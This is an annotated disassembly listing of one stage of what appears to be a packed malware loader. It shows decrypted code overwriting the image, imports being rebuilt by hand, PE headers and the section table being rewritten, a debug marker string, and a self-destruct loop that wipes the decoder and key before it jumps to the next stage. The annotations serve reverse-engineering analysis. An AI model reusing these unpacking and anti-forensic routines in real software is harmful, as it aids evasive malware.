debug028:0023080F 8B 55 CC                                mov     edx, [ebp-34h]
debug028:00230812 8D 84 0A 00 F0 FF FF                    lea     eax, [edx+ecx-1000h]
debug028:00230819 50                                      push    eax             ; dst = scratch + e.dst - 1000h
debug028:0023081A FF 95 74 FF FF FF                       call    dword ptr [ebp-8Ch] ; call memset
debug028:00230820 83 C4 0C                                add     esp, 0Ch
debug028:00230823
debug028:00230823 loc_230823:                             ; CODE XREF: my_module_3:loc_2307F9↑j
debug028:00230823 8B 4D EC                                mov     ecx, [ebp-14h]
debug028:00230826 83 C1 10                                add     ecx, 10h
debug028:00230829 89 4D EC                                mov     [ebp-14h], ecx  ; next 16-byte entry
debug028:0023082C E9 3F FF FF FF                          jmp     loc_230770
debug028:00230831 ; ---------------------------------------------------------------------------
debug028:00230831
debug028:00230831 loc_230831:                             ; CODE XREF: my_module_3+395↑j
debug028:00230831 68 00 80 00 00                          push    8000h           ; size 8000h
debug028:00230836 8B 55 CC                                mov     edx, [ebp-34h]
debug028:00230839 52                                      push    edx             ; src = scratch
debug028:0023083A B8 00 10 00 00                          mov     eax, 1000h
debug028:0023083F 05 00 00 40 00                          add     eax, offset dword_400000
debug028:00230844 50                                      push    eax             ; dst = base + 1000h
debug028:00230845
debug028:00230845 copy_decrypted_bytes_from_buffer_region: ; call memcpy
debug028:00230845 FF 55 D0                                call    dword ptr [ebp-30h] ; the rebuilt 8000h bytes overwrite RVA 1000h..8FFFh in place
debug028:00230848 83 C4 0C                                add     esp, 0Ch
debug028:0023084B 68 00 80 00 00                          push    8000h           ; MEM_RELEASE
debug028:00230850 6A 00                                   push    0
debug028:00230852 8B 4D CC                                mov     ecx, [ebp-34h]
debug028:00230855 51                                      push    ecx
debug028:00230856 FF 55 B0                                call    dword ptr [ebp-50h] ; call virtualfree  (scratch)
debug028:00230859 BA 01 00 00 00                          mov     edx, 1
debug028:0023085E 85 D2                                   test    edx, edx
debug028:00230860 0F 84 21 01 00 00                       jz      loc_230987      ; never taken (edx is the constant 1); likely a compiled-in "if (1)"
debug028:00230866 B8 98 6A 00 00                          mov     eax, 6A98h
debug028:0023086B 05 00 00 40 00                          add     eax, offset dword_400000
debug028:00230870 89 45 C8                                mov     [ebp-38h], eax  ; d = base + 6A98h; stride 14h with Name at +0Ch and FirstThunk at +10h matches IMAGE_IMPORT_DESCRIPTOR, and the header patch below points the import directory here
debug028:00230873
debug028:00230873 resolve_apis:                           ; CODE XREF: my_module_3+59E↓j
debug028:00230873 8B 4D C8                                mov     ecx, [ebp-38h]
debug028:00230876 83 79 10 00                             cmp     dword ptr [ecx+10h], 0
debug028:0023087A 75 05                                   jnz     short loc_230881
debug028:0023087C E9 06 01 00 00                          jmp     loc_230987      ; FirstThunk == 0 -> end of descriptor table
debug028:00230881 ; ---------------------------------------------------------------------------
debug028:00230881
debug028:00230881 loc_230881:                             ; CODE XREF: my_module_3+496↑j
debug028:00230881 8B 55 C8                                mov     edx, [ebp-38h]
debug028:00230884 8B 42 0C                                mov     eax, [edx+0Ch]
debug028:00230887 05 00 00 40 00                          add     eax, offset dword_400000
debug028:0023088C 89 85 68 FF FF FF                       mov     [ebp-98h], eax  ; dll name = base + d.Name
debug028:00230892 8B 8D 68 FF FF FF                       mov     ecx, [ebp-98h]
debug028:00230898 51                                      push    ecx
debug028:00230899 FF 95 70 FF FF FF                       call    dword ptr [ebp-90h] ; call getmodulehandlea
debug028:0023089F 89 45 AC                                mov     [ebp-54h], eax  ; hmod
debug028:002308A2 83 7D AC 00                             cmp     dword ptr [ebp-54h], 0
debug028:002308A6 75 10                                   jnz     short loc_2308B8
debug028:002308A8 8B 95 68 FF FF FF                       mov     edx, [ebp-98h]
debug028:002308AE 52                                      push    edx
debug028:002308AF FF 95 34 FF FF FF                       call    dword ptr [ebp-0CCh] ; call loadlibrarya  (only if the module is not already loaded)
debug028:002308B5 89 45 AC                                mov     [ebp-54h], eax
debug028:002308B8
debug028:002308B8 loc_2308B8:                             ; CODE XREF: my_module_3+4C2↑j
debug028:002308B8 8B 45 C8                                mov     eax, [ebp-38h]
debug028:002308BB 8B 48 10                                mov     ecx, [eax+10h]
debug028:002308BE 81 C1 00 00 40 00                       add     ecx, offset dword_400000
debug028:002308C4 89 4D C4                                mov     [ebp-3Ch], ecx  ; t = base + d.FirstThunk
debug028:002308C7 C7 45 FC 00 00 00 00                    mov     dword ptr [ebp-4], 0 ; k = 0
debug028:002308CE
debug028:002308CE loc_2308CE:                             ; CODE XREF: my_module_3+590↓j
debug028:002308CE 8B 55 C4                                mov     edx, [ebp-3Ch]
debug028:002308D1 83 3A 00                                cmp     dword ptr [edx], 0
debug028:002308D4 75 05                                   jnz     short loc_2308DB
debug028:002308D6 E9 9E 00 00 00                          jmp     loc_230979      ; zero thunk terminates this module's list
debug028:002308DB ; ---------------------------------------------------------------------------
debug028:002308DB
debug028:002308DB loc_2308DB:                             ; CODE XREF: my_module_3+4F0↑j
debug028:002308DB 8B 45 C4                                mov     eax, [ebp-3Ch]
debug028:002308DE 8B 08                                   mov     ecx, [eax]
debug028:002308E0 81 E1 00 00 00 80                       and     ecx, 80000000h  ; IMAGE_ORDINAL_FLAG32 set -> import by ordinal
debug028:002308E6 74 30                                   jz      short loc_230918
debug028:002308E8 8B 55 C4                                mov     edx, [ebp-3Ch]
debug028:002308EB 8B 02                                   mov     eax, [edx]
debug028:002308ED 25 FF FF FF 7F                          and     eax, 7FFFFFFFh  ; ordinal number
debug028:002308F2 50                                      push    eax
debug028:002308F3 8B 4D AC                                mov     ecx, [ebp-54h]
debug028:002308F6 51                                      push    ecx
debug028:002308F7 FF 55 D8                                call    dword ptr [ebp-28h] ; call getprocaddr  (GetProcAddress(hmod, ordinal))
debug028:002308FA 89 85 7C FF FF FF                       mov     [ebp-84h], eax
debug028:00230900 8B 55 C8                                mov     edx, [ebp-38h]
debug028:00230903 8B 42 10                                mov     eax, [edx+10h]
debug028:00230906 8B 4D FC                                mov     ecx, [ebp-4]
debug028:00230909 8B 95 7C FF FF FF                       mov     edx, [ebp-84h]
debug028:0023090F 89 94 88 00 00 40 00                    mov     dword_400000[eax+ecx*4], edx ; IAT[k] = resolved address (overwrites the thunk in place)
debug028:00230916 EB 4A                                   jmp     short loc_230962
debug028:00230918 ; ---------------------------------------------------------------------------
debug028:00230918
debug028:00230918 loc_230918:                             ; CODE XREF: my_module_3+502↑j
debug028:00230918 8B 45 C4                                mov     eax, [ebp-3Ch]
debug028:0023091B 8B 08                                   mov     ecx, [eax]
debug028:0023091D 81 C1 00 00 40 00                       add     ecx, offset dword_400000
debug028:00230923 89 8D 2C FF FF FF                       mov     [ebp-0D4h], ecx ; base + thunk = IMAGE_IMPORT_BY_NAME
debug028:00230929 8B 95 2C FF FF FF                       mov     edx, [ebp-0D4h]
debug028:0023092F 83 C2 02                                add     edx, 2          ; skip the 2-byte Hint -> function name string
debug028:00230932 89 95 24 FF FF FF                       mov     [ebp-0DCh], edx
debug028:00230938 8B 85 24 FF FF FF                       mov     eax, [ebp-0DCh]
debug028:0023093E 50                                      push    eax
debug028:0023093F 8B 4D AC                                mov     ecx, [ebp-54h]
debug028:00230942 51                                      push    ecx
debug028:00230943 FF 55 D8                                call    dword ptr [ebp-28h] ; call getprocaddr  (GetProcAddress(hmod, name))
debug028:00230946 89 85 7C FF FF FF                       mov     [ebp-84h], eax
debug028:0023094C 8B 55 C8                                mov     edx, [ebp-38h]
debug028:0023094F 8B 42 10                                mov     eax, [edx+10h]
debug028:00230952 8B 4D FC                                mov     ecx, [ebp-4]
debug028:00230955 8B 95 7C FF FF FF                       mov     edx, [ebp-84h]
debug028:0023095B 89 94 88 00 00 40 00                    mov     dword_400000[eax+ecx*4], edx ; IAT[k] = resolved address
debug028:00230962
debug028:00230962 loc_230962:                             ; CODE XREF: my_module_3+532↑j
debug028:00230962 8B 45 C4                                mov     eax, [ebp-3Ch]
debug028:00230965 83 C0 04                                add     eax, 4
debug028:00230968 89 45 C4                                mov     [ebp-3Ch], eax  ; t++
debug028:0023096B 8B 4D FC                                mov     ecx, [ebp-4]
debug028:0023096E 83 C1 01                                add     ecx, 1
debug028:00230971 89 4D FC                                mov     [ebp-4], ecx    ; k++
debug028:00230974 E9 55 FF FF FF                          jmp     loc_2308CE
debug028:00230979 ; ---------------------------------------------------------------------------
debug028:00230979
debug028:00230979 loc_230979:                             ; CODE XREF: my_module_3+4F2↑j
debug028:00230979 8B 55 C8                                mov     edx, [ebp-38h]
debug028:0023097C 83 C2 14                                add     edx, 14h
debug028:0023097F 89 55 C8                                mov     [ebp-38h], edx  ; next descriptor (sizeof IMAGE_IMPORT_DESCRIPTOR = 14h)
debug028:00230982 E9 EC FE FF FF                          jmp     resolve_apis
debug028:00230987 ; ---------------------------------------------------------------------------
debug028:00230987
debug028:00230987 loc_230987:                             ; CODE XREF: my_module_3+47C↑j
debug028:00230987                                         ; my_module_3+498↑j
debug028:00230987 ; PE header patching. All offsets below are relative to the NT header:
debug028:00230987 ;   +6    FileHeader.NumberOfSections          +14h FileHeader.SizeOfOptionalHeader
debug028:00230987 ;   +28h  OptionalHeader.AddressOfEntryPoint   +78h DataDirectory[0], 8 bytes per entry
debug028:00230987 B8 3C 00 00 00                          mov     eax, 3Ch        ; e_lfanew
debug028:0023098C 8B 88 00 00 40 00                       mov     ecx, dword_400000[eax]
debug028:00230992 81 C1 00 00 40 00                       add     ecx, offset dword_400000
debug028:00230998 89 4D E0                                mov     [ebp-20h], ecx ; ECX=address start PE header in memory
debug028:0023099B BA 04 00 00 00                          mov     edx, 4
debug028:002309A0 8B 45 E0                                mov     eax, [ebp-20h]
debug028:002309A3 66 89 50 06                             mov     [eax+6], dx     ; NumberOfSections = 4 (matches the 4 headers in the template below)
debug028:002309A7 8B 4D E0                                mov     ecx, [ebp-20h]
debug028:002309AA C7 41 28 F0 15 00 00                    mov     dword ptr [ecx+28h], 15F0h ; 0x28 = AddressOfEntryPoint
debug028:002309AA                                         ; at end of module three we will jump to 15F0
debug028:002309B1 BA 08 00 00 00                          mov     edx, 8
debug028:002309B6 C1 E2 00                                shl     edx, 0          ; 8 * 1 -> DataDirectory[1] = IMPORT
debug028:002309B9 8B 45 E0                                mov     eax, [ebp-20h]
debug028:002309BC C7 44 10 78 98 6A 00 00                 mov     dword ptr [eax+edx+78h], 6A98h ; 78+8=80
debug028:002309BC                                         ; 0x80=RVA of Import Directory
debug028:002309C4 B9 08 00 00 00                          mov     ecx, 8
debug028:002309C9 C1 E1 00                                shl     ecx, 0
debug028:002309CC 8B 55 E0                                mov     edx, [ebp-20h]
debug028:002309CF C7 44 0A 7C 50 00 00 00                 mov     dword ptr [edx+ecx+7Ch], 50h ; size of Import Directory (4 descriptors of 14h)
debug028:002309D7 B8 08 00 00 00                          mov     eax, 8
debug028:002309DC 6B C8 0C                                imul    ecx, eax, 0Ch ; ecx=0x60  (8 * 12 -> DataDirectory[12] = IAT)
debug028:002309DF 8B 55 E0                                mov     edx, [ebp-20h]
debug028:002309E2 C7 44 0A 78 00 20 00 00                 mov     dword ptr [edx+ecx+78h], 2000h ; 60+78=D8
debug028:002309E2                                         ; 0xD8=IAT
debug028:002309EA B8 08 00 00 00                          mov     eax, 8
debug028:002309EF 6B C8 0C                                imul    ecx, eax, 0Ch
debug028:002309F2 8B 55 E0                                mov     edx, [ebp-20h]
debug028:002309F5 C7 44 0A 7C 48 00 00 00                 mov     dword ptr [edx+ecx+7Ch], 48h ; size IAT
debug028:002309FD B8 08 00 00 00                          mov     eax, 8
debug028:00230A02 6B C8 05                                imul    ecx, eax, 5 ; ecx=0x28  (8 * 5 -> DataDirectory[5] = BASERELOC)
debug028:00230A05 8B 55 E0                                mov     edx, [ebp-20h]
debug028:00230A08 C7 44 0A 78 00 80 00 00                 mov     dword ptr [edx+ecx+78h], 8000h ; 28+78=A0
debug028:00230A08                                         ; Base Relocation Table
debug028:00230A10 B8 08 00 00 00                          mov     eax, 8
debug028:00230A15 6B C8 05                                imul    ecx, eax, 5
debug028:00230A18 8B 55 E0                                mov     edx, [ebp-20h]
debug028:00230A1B C7 44 0A 7C 68 00 00 00                 mov     dword ptr [edx+ecx+7Ch], 68h ; size of Base Relocation Table
debug028:00230A23 B8 08 00 00 00                          mov     eax, 8
debug028:00230A28 6B C8 00                                imul    ecx, eax, 0     ; 8 * 0 -> DataDirectory[0] = EXPORT
debug028:00230A2B 8B 55 E0                                mov     edx, [ebp-20h]
debug028:00230A2E C7 44 0A 78 00 00 00 00                 mov     dword ptr [edx+ecx+78h], 0 ; export directory RVA cleared
debug028:00230A36 50                                      push    eax
debug028:00230A37 E8 00 00 00 00                          call    $+5
debug028:00230A3C 58                                      pop     eax             ; eax = 230A3Ch
debug028:00230A3D E9 A0 00 00 00                          jmp     loc_230AE2      ; 5-byte near jmp over the section-header template
debug028:00230A3D ; ---------------------------------------------------------------------------
debug028:00230A42 ; Template of 4 IMAGE_SECTION_HEADERs (28h bytes each, 0A0h total). Per entry:
debug028:00230A42 ; Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
debug028:00230A42 ; PointerToRelocations, PointerToLinenumbers, NumberOfRelocations/Linenumbers,
debug028:00230A42 ; Characteristics (the last 4 bytes of each db line).
debug028:00230A42 2E 74 65 78 74 00 00 00                 aText_0 db '.text',0,0,0 ; .text [name]
debug028:00230A4A E8 0A 00 00                             dd 0AE8h ; .text [virtualsize]
debug028:00230A4E 00 10 00 00                             dd 1000h ; .text [virtualaddress]
debug028:00230A52 00 0C 00 00                             dd 0C00h ; .text [sizeofrawdata]
debug028:00230A56 00 04 00 00 00 00 00 00 00 00+          db 0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,' ',0,0,'`' ; PointerToRawData 400h; Characteristics 60000020h = CODE|EXECUTE|READ
debug028:00230A6A 2E 72 64 61 74 61 00 00                 aRdata_0 db '.rdata',0,0 ; .rdata [name]
debug028:00230A72 4A 4C 00 00                             dd 4C4Ah ; .rdata [virtualsize]
debug028:00230A76 00 20 00 00                             dd 2000h ; .rdata [virtualaddress]
debug028:00230A7A 00 4E 00 00                             dd 4E00h ; .rdata [sizeofrawdata]
debug028:00230A7E 00 10 00 00 00 00 00 00 00 00+          db 0,10h,0,0,0,0,0,0,0,0,0,0,0,0,0,0,'@',0,0,'@' ; PointerToRawData 1000h; Characteristics 40000040h = INITIALIZED_DATA|READ
debug028:00230A92 2E 64 61 74 61 00 00 00                 aData_0 db '.data',0,0,0 ; .data [name]
debug028:00230A9A 38 00 00 00                             dd 38h ; .data [virtualsize]
debug028:00230A9E 00 70 00 00                             dd 7000h ; .data [virtualaddress]
debug028:00230AA2 00 02 00 00                             dd 200h ; .data [sizeofrawdata]
debug028:00230AA6 00 5E 00 00 00 00 00 00 00 00+          db 0,'^',0,0,0,0,0,0,0,0,0,0,0,0,0,0,'@',0,0,'À' ; PointerToRawData 5E00h; Characteristics 0C0000040h = INITIALIZED_DATA|READ|WRITE
debug028:00230ABA 2E 72 65 6C 6F 63 00 00                 aReloc db '.reloc',0,0 ; .reloc [name]
debug028:00230AC2 68 00 00 00                             dd 68h ; .reloc [virtualsize]
debug028:00230AC6 00 80 00 00                             dd 8000h ; .reloc [virtualaddress]
debug028:00230ACA 00 02 00 00                             dd 200h ; .reloc [sizeofrawdata]
debug028:00230ACE 00 60 00 00 00 00 00 00 00 00+          db 0,'`',0,0,0,0,0,0,0,0,0,0,0,0,0,0,'@',0,0,'B' ; PointerToRawData 6000h; Characteristics 42000040h = INITIALIZED_DATA|DISCARDABLE|READ
debug028:00230AE2 ; ---------------------------------------------------------------------------
debug028:00230AE2
debug028:00230AE2 loc_230AE2:                             ; CODE XREF: my_module_3+659↑j
debug028:00230AE2 83 C0 03                                add     eax, 3          ; 230A3Ch + 3 = 230A3Fh
debug028:00230AE2 ; NOTE(review): the other two call-$+5 sites add 3 to skip a 1-byte pop plus a
debug028:00230AE2 ; 2-byte jmp short, but the jmp above is the 5-byte E9 form, so as listed the
debug028:00230AE2 ; source pointer lands 3 bytes before aText_0 (inside the jmp's displacement).
debug028:00230AE2 ; Worth confirming in a debugger whether the copied section table really starts
debug028:00230AE2 ; at aText_0 or is shifted by 3 bytes.
debug028:00230AE5 89 85 1C FF FF FF                       mov     [ebp-0E4h], eax ; src for the section-table copy
debug028:00230AEB 58                                      pop     eax
debug028:00230AEC 68 A0 00 00 00                          push    0A0h            ; size = 4 * 28h
debug028:00230AF1 8B 85 1C FF FF FF                       mov     eax, [ebp-0E4h]
debug028:00230AF7 50                                      push    eax             ; src = template
debug028:00230AF8 8B 4D E0                                mov     ecx, [ebp-20h]
debug028:00230AFB 0F B7 51 14                             movzx   edx, word ptr [ecx+14h] ; SizeOfOptionalHeader
debug028:00230AFF 8B 45 E0                                mov     eax, [ebp-20h]
debug028:00230B02 8D 4C 10 18                             lea     ecx, [eax+edx+18h] ; first section header = NT + 18h + SizeOfOptionalHeader
debug028:00230B06 51                                      push    ecx             ; dst = section table
debug028:00230B07 FF 55 D0                                call    dword ptr [ebp-30h] ; call memcpy
debug028:00230B0A 83 C4 0C                                add     esp, 0Ch
debug028:00230B0D C7 85 04 FF FF FF F0 15 40 00           mov     dword ptr [ebp-0FCh], offset sub_4015F0 ; next stage = base + 15F0h, the AddressOfEntryPoint written above
debug028:00230B17 50                                      push    eax
debug028:00230B18 E8 00 00 00 00                          call    $+5
debug028:00230B1D 58                                      pop     eax             ; eax = 230B1Dh
debug028:00230B1E EB 08                                   jmp     short loc_230B28
debug028:00230B1E ; ---------------------------------------------------------------------------
debug028:00230B20 5A 78 6B 65 6E 70 5A 00                 aZxkenpZ_0 db 'ZxkenpZ',0 ; marker string handed to OutputDebugString below; a cheap thing to watch for in a debugger/ETW trace
debug028:00230B28 ; ---------------------------------------------------------------------------
debug028:00230B28
debug028:00230B28 loc_230B28:                             ; CODE XREF: my_module_3+73A↑j
debug028:00230B28 83 C0 03                                add     eax, 3          ; 230B1Dh + 3 = 230B20h = aZxkenpZ_0
debug028:00230B2B 89 85 14 FF FF FF                       mov     [ebp-0ECh], eax
debug028:00230B31 58                                      pop     eax
debug028:00230B32 8B 95 14 FF FF FF                       mov     edx, [ebp-0ECh]
debug028:00230B38 52                                      push    edx
debug028:00230B39 FF 95 0C FF FF FF                       call    dword ptr [ebp-0F4h] ; call outputdebugstring  (OutputDebugString("ZxkenpZ"))
debug028:00230B3F 50                                      push    eax
debug028:00230B40 E8 00 00 00 00                          call    $+5
debug028:00230B45 58                                      pop     eax             ; eax = 230B45h
debug028:00230B46 89 45 A8                                mov     [ebp-58h], eax ; get current address
debug028:00230B49 58                                      pop     eax
debug028:00230B4A
debug028:00230B4A self_destruct:                          ; CODE XREF: my_module_3+77D↓j
debug028:00230B4A ; Zeroes one byte at a time from 230B45h downward until the cursor equals
debug028:00230B4A ; [ebp-5Ch] (set before this module). The loop itself, leave and jmp eax sit
debug028:00230B4A ; above the start address, so they survive; everything below (the decoder,
debug028:00230B4A ; the key, the section template) is wiped before control leaves the module.
debug028:00230B4A 8B 45 A8                                mov     eax, [ebp-58h]
debug028:00230B4D 3B 45 A4                                cmp     eax, [ebp-5Ch] ; start memory region
debug028:00230B50 74 11                                   jz      short end_self_destruct
debug028:00230B52 8B 4D A8                                mov     ecx, [ebp-58h]
debug028:00230B55 C6 01 00                                mov     byte ptr [ecx], 0 ; *cursor = 0
debug028:00230B58 8B 55 A8                                mov     edx, [ebp-58h]
debug028:00230B5B 83 EA 01                                sub     edx, 1
debug028:00230B5E 89 55 A8                                mov     [ebp-58h], edx  ; cursor--
debug028:00230B61 EB E7                                   jmp     short self_destruct
debug028:00230B63 ; ---------------------------------------------------------------------------
debug028:00230B63
debug028:00230B63 end_self_destruct:                      ; CODE XREF: my_module_3+76C↑j
debug028:00230B63 8B 85 04 FF FF FF                       mov     eax, [ebp-0FCh] ; sub_4015F0
debug028:00230B69 C9                                      leave           ; tear down this frame; the module never returns
debug028:00230B6A FF E0                                   jmp     eax ; jump to module four
debug028:00230B6A                                         my_module_3 endp ; sp-analysis failed
debug028:00230B6A
debug028:00230B6A ; ---------------------------------------------------------------------------